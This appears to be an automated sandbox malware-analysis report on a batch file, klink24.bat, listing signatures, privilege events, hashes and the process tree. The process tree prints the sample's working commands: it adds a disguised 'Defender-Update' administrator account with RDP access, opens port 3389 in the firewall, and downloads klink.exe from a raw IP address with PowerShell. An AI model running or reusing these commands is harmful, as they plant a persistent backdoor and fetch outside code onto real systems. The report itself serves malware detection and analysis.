Analysis
-
max time kernel
156s -
max time network
171s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
11-10-2023 20:31
Static task
static1
Behavioral task
behavioral1
Sample
klink24.bat
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
klink24.bat
Resource
win10v2004-20230915-en
General
-
Target
klink24.bat
-
Size
1KB
-
MD5
81b71168a37befd2646587909efa050b
-
SHA1
965a0db15b5cf77ea3c285d4f49d41b92a3d364d
-
SHA256
d51b466d9bd852e4b463096b9a922fe9e06e75e1258d274b576103498e578c01
-
SHA512
55e5a056d70b6799600c28d084593cdbde2eab836b33024d458f00971f03a87a076b760ee6b21913523996d20b695bc7f024eb59e46c03aa253708e5fd62339b
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 33 3884 powershell.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 4012 netsh.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3884 powershell.exe 3884 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 3736 WMIC.exe Token: SeSecurityPrivilege 3736 WMIC.exe Token: SeTakeOwnershipPrivilege 3736 WMIC.exe Token: SeLoadDriverPrivilege 3736 WMIC.exe Token: SeSystemProfilePrivilege 3736 WMIC.exe Token: SeSystemtimePrivilege 3736 WMIC.exe Token: SeProfSingleProcessPrivilege 3736 WMIC.exe Token: SeIncBasePriorityPrivilege 3736 WMIC.exe Token: SeCreatePagefilePrivilege 3736 WMIC.exe Token: SeBackupPrivilege 3736 WMIC.exe Token: SeRestorePrivilege 3736 WMIC.exe Token: SeShutdownPrivilege 3736 WMIC.exe Token: SeDebugPrivilege 3736 WMIC.exe Token: SeSystemEnvironmentPrivilege 3736 WMIC.exe Token: SeRemoteShutdownPrivilege 3736 WMIC.exe Token: SeUndockPrivilege 3736 WMIC.exe Token: SeManageVolumePrivilege 3736 WMIC.exe Token: 33 3736 WMIC.exe Token: 34 3736 WMIC.exe Token: 35 3736 WMIC.exe Token: 36 3736 WMIC.exe Token: SeIncreaseQuotaPrivilege 3736 WMIC.exe Token: SeSecurityPrivilege 3736 WMIC.exe Token: SeTakeOwnershipPrivilege 3736 WMIC.exe Token: SeLoadDriverPrivilege 3736 WMIC.exe Token: SeSystemProfilePrivilege 3736 WMIC.exe Token: SeSystemtimePrivilege 3736 WMIC.exe Token: SeProfSingleProcessPrivilege 3736 WMIC.exe Token: SeIncBasePriorityPrivilege 3736 WMIC.exe Token: SeCreatePagefilePrivilege 3736 WMIC.exe Token: SeBackupPrivilege 3736 WMIC.exe Token: SeRestorePrivilege 3736 WMIC.exe Token: SeShutdownPrivilege 3736 WMIC.exe Token: SeDebugPrivilege 3736 WMIC.exe Token: SeSystemEnvironmentPrivilege 3736 WMIC.exe Token: SeRemoteShutdownPrivilege 3736 WMIC.exe Token: SeUndockPrivilege 3736 WMIC.exe Token: SeManageVolumePrivilege 3736 WMIC.exe Token: 33 3736 WMIC.exe Token: 34 3736 WMIC.exe Token: 35 3736 WMIC.exe Token: 36 3736 WMIC.exe Token: SeIncreaseQuotaPrivilege 3856 WMIC.exe Token: SeSecurityPrivilege 3856 WMIC.exe Token: SeTakeOwnershipPrivilege 3856 WMIC.exe Token: SeLoadDriverPrivilege 3856 WMIC.exe Token: SeSystemProfilePrivilege 3856 WMIC.exe Token: SeSystemtimePrivilege 3856 WMIC.exe Token: SeProfSingleProcessPrivilege 3856 WMIC.exe Token: SeIncBasePriorityPrivilege 3856 WMIC.exe Token: SeCreatePagefilePrivilege 3856 WMIC.exe Token: SeBackupPrivilege 3856 WMIC.exe Token: SeRestorePrivilege 3856 WMIC.exe Token: SeShutdownPrivilege 3856 WMIC.exe Token: SeDebugPrivilege 3856 WMIC.exe Token: SeSystemEnvironmentPrivilege 3856 WMIC.exe Token: SeRemoteShutdownPrivilege 3856 WMIC.exe Token: SeUndockPrivilege 3856 WMIC.exe Token: SeManageVolumePrivilege 3856 WMIC.exe Token: 33 3856 WMIC.exe Token: 34 3856 WMIC.exe Token: 35 3856 WMIC.exe Token: 36 3856 WMIC.exe Token: SeIncreaseQuotaPrivilege 3856 WMIC.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 232 wrote to memory of 4984 232 cmd.exe 86 PID 232 wrote to memory of 4984 232 cmd.exe 86 PID 4984 wrote to memory of 3736 4984 cmd.exe 87 PID 4984 wrote to memory of 3736 4984 cmd.exe 87 PID 4984 wrote to memory of 2860 4984 cmd.exe 88 PID 4984 wrote to memory of 2860 4984 cmd.exe 88 PID 232 wrote to memory of 2208 232 cmd.exe 90 PID 232 wrote to memory of 2208 232 cmd.exe 90 PID 2208 wrote to memory of 3856 2208 cmd.exe 91 PID 2208 wrote to memory of 3856 2208 cmd.exe 91 PID 2208 wrote to memory of 4644 2208 cmd.exe 92 PID 2208 wrote to memory of 4644 2208 cmd.exe 92 PID 232 wrote to memory of 612 232 cmd.exe 93 PID 232 wrote to memory of 612 232 cmd.exe 93 PID 612 wrote to memory of 1500 612 net.exe 94 PID 612 wrote to memory of 1500 612 net.exe 94 PID 232 wrote to memory of 3296 232 cmd.exe 96 PID 232 wrote to memory of 3296 232 cmd.exe 96 PID 3296 wrote to memory of 1288 3296 net.exe 97 PID 3296 wrote to memory of 1288 3296 net.exe 97 PID 232 wrote to memory of 4072 232 cmd.exe 99 PID 232 wrote to memory of 4072 232 cmd.exe 99 PID 4072 wrote to memory of 3860 4072 net.exe 98 PID 4072 wrote to memory of 3860 4072 net.exe 98 PID 232 wrote to memory of 5016 232 cmd.exe 100 PID 232 wrote to memory of 5016 232 cmd.exe 100 PID 232 wrote to memory of 4012 232 cmd.exe 101 PID 232 wrote to memory of 4012 232 cmd.exe 101 PID 232 wrote to memory of 3884 232 cmd.exe 102 PID 232 wrote to memory of 3884 232 cmd.exe 102
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\klink24.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:232 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="2⤵
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Windows\System32\Wbem\WMIC.exewmic Group Where "SID = 'S-1-5-32-544'" Get Name /Value3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3736
-
-
C:\Windows\system32\find.exeFind "="3⤵PID:2860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="2⤵
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Windows\System32\Wbem\WMIC.exewmic Group Where "SID = 'S-1-5-32-555'" Get Name /Value3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3856
-
-
C:\Windows\system32\find.exeFind "="3⤵PID:4644
-
-
-
C:\Windows\system32\net.exenet user Defender-Update defen2!AW7W21 /add /expires:never2⤵
- Suspicious use of WriteProcessMemory
PID:612 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Defender-Update defen2!AW7W21 /add /expires:never3⤵PID:1500
-
-
-
C:\Windows\system32\net.exenet localgroup Administrators Defender-Update /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3296 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators Defender-Update /ADD3⤵PID:1288
-
-
-
C:\Windows\system32\net.exenet localgroup "Remote Desktop Users" Defender-Update /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:4072
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f2⤵PID:5016
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow2⤵
- Modifies Windows Firewall
PID:4012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell iwr http://78.47.123.155:8233/klink.exe -OutFile c:\programdata\klink.exe2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:3884
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" Defender-Update /ADD1⤵PID:3860
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82